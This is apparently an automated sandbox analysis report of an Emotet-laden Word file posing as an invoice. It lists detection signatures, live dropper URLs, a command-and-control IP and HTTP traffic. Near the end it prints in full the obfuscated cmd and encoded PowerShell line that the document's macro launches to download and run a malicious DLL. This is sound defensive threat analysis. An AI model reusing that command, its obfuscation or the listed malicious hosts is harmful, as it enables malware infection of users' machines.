Analysis Report Invoice 6682363.doc

Overview

General Information

Sample Name: Invoice 6682363.doc
Analysis ID: 343627
MD5: 2f788f4b380f7a0976e1992ef800d38e
SHA1: b210ad5140fbd4d8a1c8d36cc253f3dbe874d248
SHA256: 71952c503a38dbbefa7069548e7466de0fef1f5d95d5eade8abcdf5fb62037c7

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/ Avira URL Cloud: Label: malware
Source: http://transal.eu/netgear-wifi-qzvv4/1j7XZ/ Avira URL Cloud: Label: malware
Source: http://relatedgrouptest.com/OurTime/culeTFa3v/ Avira URL Cloud: Label: malware
Source: https://www.schmuckfedern.info/reference/0HlBBg8/ Avira URL Cloud: Label: malware
Source: http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/ Avira URL Cloud: Label: malware
Source: http://ofert-al.com/wp-content/t9hVViBde/ Avira URL Cloud: Label: malware
Source: https://www.schmuckfedern.info/reference/0HlBBg8/P Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/ Virustotal: Detection: 13%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Metadefender: Detection: 45%
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: Invoice 6682363.doc Virustotal: Detection: 52%
Source: Invoice 6682363.doc Metadefender: Detection: 43%
Source: Invoice 6682363.doc ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbx source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2102635935.000000001B460000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: micronews.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 93.119.104.27:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 93.119.104.27:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49169 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in memory: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/!http://ofert-al.com/wp-content/t9hVViBde/!http://transal.eu/netgear-wifi-qzvv4/1j7XZ/!http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/!http://relatedgrouptest.com/OurTime/culeTFa3v/!https://www.schmuckfedern.info/reference/0HlBBg8/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /crankshaft-pulley-i5aio/Tlp/ HTTP/1.1Host: micronews.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/t9hVViBde/ HTTP/1.1Host: ofert-al.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.55.186.229 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TelecentroSAAR TelecentroSAAR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/ HTTP/1.1DNT: 0Referer: 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/Content-Type: multipart/form-data; boundary=-----------DlOKA6XxDmYUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6452Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EA89377-30AB-4901-9D2A-3CE504568F55}.tmp
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: micronews.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Jan 2021 07:21:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micronews.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8 Data Ascii: c2<!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found &#8211; My Blog</title>
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/crankshaft-pulley-i5aio/Tlp/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-content/themes/twentytwentyone/style.css?ver=1.1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/css/dist/block-library/theme.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: http://micronews.eu/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: http://ofert-al.com
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://ofert-al.com/wp-content/t9hVViBde/
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://relatedgrouptest.com/OurTime/culeTFa3v/
Source: powershell.exe, 00000005.00000002.2094837855.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2118008797.0000000002790000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: http://transal.eu/netgear-wifi-qzvv4/1j7XZ/
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2094837855.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2118008797.0000000002790000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2108646155.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105788606.0000000002217000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117476075.0000000001E67000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127453028.0000000002417000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2138586340.0000000001F67000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 0000000A.00000002.2138437202.0000000001D80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/2021/01/24/hello-world/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/2021/01/24/hello-world/#comment-1
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/comments/feed/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/feed/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/wp-json/
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://micronews.eu/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2102208067.0000000003C0A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2102193872.0000000003BE6000.00000004.00000001.sdmp String found in binary or memory: https://wordpress.org/
Source: powershell.exe, 00000005.00000002.2102110583.0000000003ADA000.00000004.00000001.sdmp String found in binary or memory: https://www.schmuckfedern.info/reference/0HlBBg8/
Source: powershell.exe, 00000005.00000002.2096314239.0000000002CF4000.00000004.00000001.sdmp String found in binary or memory: https://www.schmuckfedern.info/reference/0HlBBg8/P

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing, and then click Enable Content
Source: Document image extraction number: 0 Screenshot OCR: Enable Content
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing, and then click Enable Content
Source: Document image extraction number: 1 Screenshot OCR: Enable Content
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll
Very long command line found
Source: unknown Process created: Commandline size = 5493
Source: unknown Process created: Commandline size = 5392
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5392
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wkjjpdqip\
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Invoice 6682363.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zvfrgl3zqkd2gw3, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Invoice 6682363.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2108466850.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105366443.0000000002030000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117339120.0000000001C80000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2127284890.0000000002230000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@32/7@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$voice 6682363.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBC7.tmp
Source: Invoice 6682363.doc OLE indicator, Word Document stream: true
Source: Invoice 6682363.doc OLE document summary: title field not present or empty
Source: Invoice 6682363.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: Invoice 6682363.doc Virustotal: Detection: 52%
Source: Invoice 6682363.doc Metadefender: Detection: 43%
Source: Invoice 6682363.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBp
ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
